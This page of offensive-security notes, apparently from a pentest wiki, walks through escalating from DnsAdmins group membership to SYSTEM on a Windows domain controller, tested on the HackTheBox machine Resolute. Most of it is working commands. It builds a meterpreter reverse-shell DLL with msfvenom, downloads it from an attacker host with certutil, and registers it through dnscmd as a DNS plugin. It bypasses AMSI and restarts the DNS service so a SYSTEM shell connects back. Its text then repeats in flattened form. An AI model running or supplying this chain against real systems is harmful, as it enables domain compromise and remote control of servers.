DNS Admin to SYSTEM

# Check User
net user {username} /domain  

# Generate DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -a x64 LHOST=10.10.14.40 LPORT=9001 -f dll > mp64.dll

# Copy the evil DLL to the victim
certutil -urlcache -split -f http://10.10.14.40:8000/mp64.dll

# Verify the above command
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

# Abuse DNS with dnscmd
Now that we have the DLL and we checked that it is working, we can ask the victim DC01 to load our malicious DLL (from the victim controlled network share on host 10.0.0.2) next time the service starts (or when the attacker restarts it):   
dnscmd { victim} /config /serverlevelplugindll { Path of the DLL }
Example:
dnscmd resolute /config /serverlevelplugindll C:\Users\ryan\Documents\mp64.dll

# Getting code execution with NT\SYSTEM
Now the next time dns service starts, our malicious DLL should be loaded to the dns.exe process and a reverse shell should be sent back to our attacking system, so let's go and restart the DNS service:
sc.exe \\10.10.10.169 stop dns
sc.exe \\10.10.10.169 start dns

# Putting it all together
Bypass-4MSI
certutil -urlcache -split -f http://10.10.14.40:8000/mp64.dll
dnscmd resolute /config /serverlevelplugindll C:\Users\ryan\Documents\mp64.dll
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
sc.exe \\10.10.10.169 stop dns
sc.exe \\10.10.10.169 start dns

### This worked on HackTheBox : Resolute ###
C:\Windows\system32>systeminfo
systeminfo

Host Name:                 RESOLUTE
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00376-30821-30176-AA312
Original Install Date:     9/25/2019, 10:17:51 AM
System Boot Time:          1/19/2020, 1:49:19 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,177 MB
Virtual Memory: Max Size:  2,431 MB
Virtual Memory: Available: 1,578 MB
Virtual Memory: In Use:    853 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    megabank.local
Logon Server:              N/A
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB3199986
                           [02]: KB4512574
                           [03]: KB4520724
                           [04]: KB4525236
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.169
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Note: This worked flawlessly on HackTheBox: Resolute

Reference:

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise

PreviousBloodhound NextDC Sync Attack

Last updated 4 years ago

# Check User net user {username} /domain # Generate DLL msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -a x64 LHOST=10.10.14.40 LPORT=9001 -f dll > mp64.dll # Copy the evil DLL to the victim certutil -urlcache -split -f http://10.10.14.40:8000/mp64.dll # Verify the above command Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll # Abuse DNS with dnscmd Now that we have the DLL and we checked that it is working, we can ask the victim DC01 to load our malicious DLL (from the victim controlled network share on host 10.0.0.2) next time the service starts (or when the attacker restarts it): dnscmd { victim} /config /serverlevelplugindll { Path of the DLL } Example: dnscmd resolute /config /serverlevelplugindll C:\Users\ryan\Documents\mp64.dll # Getting code execution with NT\SYSTEM Now the next time dns service starts, our malicious DLL should be loaded to the dns.exe process and a reverse shell should be sent back to our attacking system, so let's go and restart the DNS service: sc.exe \\10.10.10.169 stop dns sc.exe \\10.10.10.169 start dns # Putting it all together Bypass-4MSI certutil -urlcache -split -f http://10.10.14.40:8000/mp64.dll dnscmd resolute /config /serverlevelplugindll C:\Users\ryan\Documents\mp64.dll Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll sc.exe \\10.10.10.169 stop dns sc.exe \\10.10.10.169 start dns ### This worked on HackTheBox : Resolute ### C:\Windows\system32>systeminfo systeminfo Host Name: RESOLUTE OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Primary Domain Controller OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00376-30821-30176-AA312 Original Install Date: 9/25/2019, 10:17:51 AM System Boot Time: 1/19/2020, 1:49:19 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-08:00) Pacific Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 1,177 MB Virtual Memory: Max Size: 2,431 MB Virtual Memory: Available: 1,578 MB Virtual Memory: In Use: 853 MB Page File Location(s): C:\pagefile.sys Domain: megabank.local Logon Server: N/A Hotfix(s): 4 Hotfix(s) Installed. [01]: KB3199986 [02]: KB4512574 [03]: KB4520724 [04]: KB4525236 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.169 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.